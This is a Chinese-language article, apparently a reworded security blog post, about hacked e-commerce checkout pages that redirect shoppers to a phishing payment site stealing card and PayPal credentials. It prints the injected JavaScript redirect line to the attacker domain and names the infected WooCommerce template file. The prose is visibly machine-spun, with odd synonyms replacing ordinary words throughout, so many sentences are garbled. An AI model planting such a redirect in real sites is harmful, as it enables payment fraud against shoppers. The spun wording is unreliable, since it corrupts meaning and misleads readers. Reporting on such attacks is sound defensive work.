在过去的两年里，操作被黑的电商网站对客户的信用卡信息进行垂钓，这种手法已经非常盛行了。

历史案例

此前我们曾呈报过多起案例，黑客在付款页面和付出模块加上了恶意代码，以此来窃取客户的付出信息。客户自己因为并没有太多的特征可以参考，从而很难察觉到这一点。而站长则因为此举不会滋扰到付出流程，也不容易发明这点。

与此同时，传统的窃取信用卡信息，或者是银行、PayPal登录信息的勾当，也长短常活跃的。

然而，在这个月我们遇到了上述两种类型(纯挚的垂钓网站和被黑的正常站点)的组合打击，黑客在被黑的电商站点上变动付款页面的代码，然后将客户定向到第三方垂钓网站的付出页面。

垂钓黑客凡是会使用电子邮件和垂钓网站去引诱受害者。而在今天介绍的案例中，打击者直接在被黑的合法电商网站上，劫持了付款页面。

虚假的付款页面

当客户在为商品进行付出时，他们会打开付款页面。但实际上，他们打开的并不是该电商网站付出页面，而是黑客垂钓网站的付出页面（好比这个垂钓站：）。

垂钓付款页面

它看起来确实像是正常的付款页面，如果受害者是第一次在该网站买对象，不看地点栏的话他们甚至意识不到已经转到一个完全差此外网站。因为受害者已经启动了购物剁手模式，筹备输入他们的信用卡账户了，所以这个时候受害者的警惕性是相对要低很多的。最后，你的信用卡信息被盗了，原本合法的电商网站也掉去了这单交易。

这种打击并不是只针对信用卡的。如你前面所见到的，垂钓也撑持PayPal付出。如果你点击了PayPal选项，你会看到跳转到PayPal的登录页面。固然，这里其实是cwcargo垂钓网站。

当您输入您的登录信息后，垂钓的php脚本/Checkout/PayPal-login/POST.php，会试图窃取你的PayPal登录信息。处于某种原因，它还会将你导向bluepay.com网站。

我们发明这些付款垂钓页面，并没有被谷歌官方列入垂钓站黑名单，所以我们向谷歌进行了呈报。固然，我们也向原本的电商站上进行了呈报，但愿能挽救一些潜在的受害者。

恶意重定向

我们回过头看看阿谁被黑的电商网站，黑客在这里做的非常简单，只是在付出页面加了一小段JS代码：

<script>document.location="hxxp://cwcargo.com/Checkout"</script>

好比，一个使用了Woo Commerce的WordPress站点，受传染的文件：

wp-content/plugins/woocommerce/templates/checkout/form-checkout.php

会看起来像这样（34行）：

此次打击也影响了其他的金融平台，好比这篇分析，就是传染了主题文件shopping-cart.tpl。

我们此刻还没有看到太多受传染的网站，终究这类打击很难进行检测。你需要在完成下单后才华去访谒并扫描付款页面，大大都扫描器是不敷以做到这一点的。尽管如此，我们发明这类手法在Magento类网站是对照多见的，而且这类打击的手法可能会跟着时间的推移而变革。

掩护你的电商网站

基于前面的分析，我们建议客户在网上购物时，每一步都需要连结警惕：

检测URL栏的地点和链接安适性。

查抄付出时的订单数量和收款人名称。

在存在疑点的情况下，不要继续进行付款操纵。